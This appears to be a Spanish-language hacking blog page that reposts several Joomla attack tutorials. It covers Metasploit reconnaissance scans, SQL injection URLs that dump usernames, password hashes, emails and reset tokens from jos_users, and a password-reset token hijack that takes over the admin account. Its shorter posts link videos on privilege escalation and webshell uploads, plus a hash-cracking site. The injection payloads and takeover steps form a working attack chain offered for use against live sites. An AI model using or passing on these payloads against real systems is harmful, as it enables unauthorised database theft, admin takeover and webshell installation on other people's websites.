Banner 1

Mostrando entradas con la etiqueta joomla. Mostrar todas las entradas
Mostrando entradas con la etiqueta joomla. Mostrar todas las entradas

Auditando Servidores Web Joomla con Metasploit

0 comentarios



Muchas veces cuando realizamos alguna Auditoria enfocada hacia Servidores Web, uno de los pasos mas importante que se debe realizar es Information Gathering (Recopilación de Información)  ya que esta es el paso más crítico de una prueba de seguridad de aplicaciones web que puede llevarse a cabo de muchas maneras diferentes, mediante el uso de herramientas públicas (motores de búsqueda), escáners, envío de simples peticiones HTTP o solicitudes especialmente diseñadas.
Cuando se Audita un Servidor Web Joomla, siempre es muy necesario obtener información exacta sobre que versión se encuentra instalada en el servidor, como también los Plugins instalados, esto nos ayudara mucho a determinar que Exploit debemos usar, o ver la manera exacta de explotar las vulnerabilidades, ya que una de las "mejores" formas de ingresar a un Joomla es mediante las vulnerabilidades que se encuentran en los Plugins.
Por ello, en esta entrada se mostraran los 3 módulos que se integran en Metasploit (Joomla Page Scanner, Joomla Plugin Scanner y Joomla Version Scanner) que nos ayudaran mucho a realizar este paso tan importante en nuestras Auditorias.


En primer lugar, abrimos nuestro msfconsole y tecleamos search Joomla, esta nos mostrara los 3 módulos disponibles para Auditar servidores web Joomla.
Lo primera información que debemos obtener es la versión instalada en la aplicación  por ello utilizaremos el modulo Joomla Version, utilizando los siguiente comandos:
-------------------------------------------------------------------------------------------------------------
use auxiliary/scanner/http/joomla_version
set RHOSTS www.sitio-web.com
run
-------------------------------------------------------------------------------------------------------------


En este paso hemos obtenido la información exacta sobre la versión que esta corriendo en dicha aplicación web (Joomla Version: 2.5.0) , como tambien el S.O.
Seguidamente utilizaremos el modulo Joomla Pages, esta analizara las paginas instaladas en la aplicación web, para tal caso utilizaremos los siguientes comandos:
-------------------------------------------------------------------------------------------------------------
use auxiliary/scanner/http/joomla_pages
set RHOSTS www.sitio-web.com
run
-------------------------------------------------------------------------------------------------------------


En este paso solo se obtuvieron 3 resultados, como es el robots.txt que en la mayoría de Joomla se encuentran, y obviamente la pagina /administrator/ que nos permitirá ingresar al sistema con las credenciales correctas. 
Y bueno en este ultimo modulo Joomla Plugins, obtendremos todos los Plugins instalados en la aplicación web, incluido con las vulnerabilidades de Sql Injection y LFI que se puedan encontrar en cada plugin.
-------------------------------------------------------------------------------------------------------------
use auxiliary/scanner/http/joomla_plugins
set RHOSTS www.sitio-web.com
run
-------------------------------------------------------------------------------------------------------------


Como se puede apreciar, se obtuvieron todos los plugins que cuenta dicha aplicación web, por tanto a partir de allí  podremos realizar nuestra auditoria mas a fondo, en busca de exploits para cada plugin obtenido.
Después de haber Auditado la Aplicación Web con estos 3 módulos que nos ofrece Metasploit, también es posible ejecutar 3 comandos mas (hosts, services, notes), que nos permitirá obtener información sobre IP's, nombres del Sistema Operativo que utiliza como también los puertos y servicios.
Por ultimo, el comando notes, nos mostrara toda la información obtenida durante la Auditoria que hemos realizado ejecutando los 3 módulos.
Existen muchas otras herramientas y métodos que nos permite obtener toda esta información, pero no siempre falta saber alguna que otra como este simple tutorial.

Espero les sirva, saludos ;)

Fuente:http://calebbucker.blogspot.com/2013/02/auditando-servidores-web-joomla-con.html

Admin en Joomla Mediante Token

0 comentarios
Esta entrada del blog de "seguridadblanca" me gusto asi que la comparto.

_________________________________________________________________

Después de varias semanas de inactividad les traigo este topic que escribo junto a Mandrake Murdock en el cual explicamos un caso con el que nos encontramos el día de hoy y nos ha parecido tan interesante por lo cual hoy escribiremos este post.

Resulta que encontramos una Sqli en un joomla:
http://webvuln.com/libros/index.php?id=999999999%20union%20all%20select%201,version(),3--


luego seguimos con la injection y nos encontramos con lo siguiente:


http://webvuln.com/libros/index.php?id=999999999%20union%20all%20select%201,concat(username,0x3a,password),3+FROM+jos_users--

El password no estaba por ninguna base de datos de hashes ni nada era muy complicado sacarla entonces como hacemos... en la versiones antiguas de joomla en el momento que olvidas tu contraseña, se envia un email a tu correo con un token ese token lo ingresas en un textbox y te permite ingresar una contraseña nueva, este token se guarda en la base de datos por lo cual nosotros lo que podríamos hacer es lo siguiente:


Vamos a este link: http://webvuln.com/index.php?option=com_user&view=reset entonces te va a pedir que ingreses un correo, ahi pones el correo del administrador:

http://webvuln.com/libros/index.php?id=999999999%20union%20all%20select%201,email,3+FROM+jos_users--

y luego vamos a la base de datos y buscamos un nuevo campo que se ha creado con el token del cual previamente hemos hablado.


http://webvuln.com/libros/index.php?id=999999999%20union%20all%20select%201,activation,3+FROM+jos_users--

Copiamos el token que se nos ha generado y lo pegamos en:


http://webvuln.com/index.php?option=com_user&view=reset&layout=confirm

Le damos click en enviar y luego podremos ingresar una nueva contraseña la que querramos... luego vamos a


http://webvuln.com/administrator/

y listo nos logueamos con el usuario admin y con la password que pusimos antes... y ya estamos a un pequeño pasa de como subir nuestra shell...

fuente:
http://www.seguridadblanca.com/2012/07/ganando-admin-en-joomla-mediante-token.html

Escalada de Privilegios en Joomla a través de un Registro

0 comentarios
Bueno , En este video tutorial explico como realizar una escalada de privilegios a webs joomla con versiones 1.6 , 1.7 y 2.5 mediante un registro.


Saludos , Sanko
Fuente:http://underc0de.org/foro/bugs-y-exploits/escalada-de-privilegios-en-joomla-a-traves-de-un-registro-sanko/

Que mas hacer con joomla?

0 comentarios
Bueno hace tiempo vi un video muy instructivo de mi amigo bakuro para subir shell mediante el xampp, ahora vamos a ver como subir una webshell a joomla la verdad no es nada del otro mundo pero puede que algunas personas que recien comienzan no tengan idea de como hacerlo.

Aqui dejo el video.

Subir webshell a joomla

http://www.youtube.com/watch?v=RuP0iivenoQ

Ahora mucho se han preguntado bueno que hacemos con estos hash del password de la bd , que tipo de encriptacion usa? porque tan largo? xD etc..

Aqui les dejo una pagina online para el crackeo de las mismas.


Crackeo de hash joomla

http://scr34mz.co.tv/joomlapass.php

En realidad yo recomiendo hacer el siguiente procedimiento al olvidar el pass y tenemos acceso a la bd,.

1. Entrar a http://www.adamek.biz/md5-generator.php y copiar el password que queramos.
2. Entrar al phpmyadmin o cualquier otro gestor y editar el campo del password del usuario admin o el que queramos y pegamos el que hemos generado en el punto 1.

Saludos roboticos
Powered by Bad Robot
Helped by Blackubay